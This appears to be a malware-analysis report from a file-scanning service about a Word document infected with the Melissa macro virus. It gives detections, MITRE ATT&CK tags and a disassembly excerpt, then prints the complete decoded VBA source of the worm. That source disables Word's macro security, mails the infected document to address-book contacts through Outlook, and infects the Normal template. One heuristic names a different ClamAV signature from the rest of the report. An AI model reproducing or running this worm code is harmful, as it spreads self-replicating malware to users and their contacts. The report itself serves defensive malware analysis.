MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample is a Microsoft Word document containing a VBA macro named 'Melissa' that executes upon opening. This macro attempts to disable security warnings and then uses Outlook to send copies of itself to contacts in the user's address book. The ClamAV detection of 'Win.Trojan.Melissa-4' strongly suggests this is a variant of the Melissa virus, known for its email propagation capabilities.
Heuristics 5
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Attribute VB_Name = "Melissa" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CU … -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Name = "Melissa" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CU … -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly0000592D 40 inc eax 0000592E 40 inc eax 0000592F 40 inc eax 00005930 40 inc eax 00005931 40 inc eax 00005932 40 inc eax 00005933 40 inc eax 00005934 40 inc eax 00005935 40 inc eax 00005936 40 inc eax 00005937 40 inc eax 00005938 40 inc eax 00005939 40 inc eax 0000593A 40 inc eax 0000593B 40 inc eax 0000593C 40 inc eax 0000593D 40 inc eax 0000593E 40 inc eax 0000593F 40 inc eax 00005940 40 inc eax 00005941 40 inc eax 00005942 40 inc eax 00005943 40 inc eax 00005944 40 inc eax 00005945 40 inc eax 00005946 40 inc eax 00005947 40 inc eax 00005948 40 inc eax 00005949 40 inc eax 0000594A 40 inc eax 0000594B 40 inc eax 0000594C 40 inc eax 0000594D 40 inc eax 0000594E 40 inc eax 0000594F 40 inc eax 00005950 40 inc eax 00005951 40 inc eax 00005952 40 inc eax 00005953 40 inc eax 00005954 40 inc eax 00005955 40 inc eax 00005956 40 inc eax 00005957 40 inc eax 00005958 40 inc eax 00005959 40 inc eax 0000595A 40 inc eax 0000595B 40 inc eax 0000595C 40 inc eax 0000595D 40 inc eax 0000595E 40 inc eax 0000595F 40 inc eax 00005960 40 inc eax 00005961 40 inc eax 00005962 40 inc eax 00005963 40 inc eax 00005964 40 inc eax 00005965 40 inc eax 00005966 40 inc eax 00005967 40 inc eax 00005968 40 inc eax 00005969 40 inc eax 0000596A 40 inc eax 0000596B 40 inc eax 0000596C 40 inc eax 0000596D 40 inc eax 0000596E 40 inc eax 0000596F 40 inc eax 00005970 40 inc eax 00005971 40 inc eax 00005972 40 inc eax 00005973 40 inc eax 00005974 40 inc eax 00005975 40 inc eax 00005976 40 inc eax 00005977 40 inc eax 00005978 40 inc eax 00005979 40 inc eax 0000597A 40 inc eax 0000597B 40 inc eax 0000597C 40 inc eax 0000597D 40 inc eax 0000597E 40 inc eax 0000597F 40 inc eax 00005980 40 inc eax 00005981 40 inc eax 00005982 40 inc eax 00005983 40 inc eax 00005984 40 inc eax 00005985 40 inc eax 00005986 40 inc eax 00005987 40 inc eax 00005988 40 inc eax 00005989 40 inc eax 0000598A 40 inc eax 0000598B 40 inc eax 0000598C 40 inc eax
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3743 bytes |
SHA-256: 1cdfa4537e4bb35726cb0d0660c1b5e7fb4d08aec222549ea3334a925ce96e81 |
|||
|
Detection
ClamAV:
Doc.Trojan.Melissa-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.codemodule.CountOfLines
ADCL = ADI1.codemodule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.codemodule.deletelines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.codemodule.deletelines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.codemodule.Lines(1, 1) = ""
ADI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, ADI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.codemodule.Lines(1, 1) = ""
NTI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, NTI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.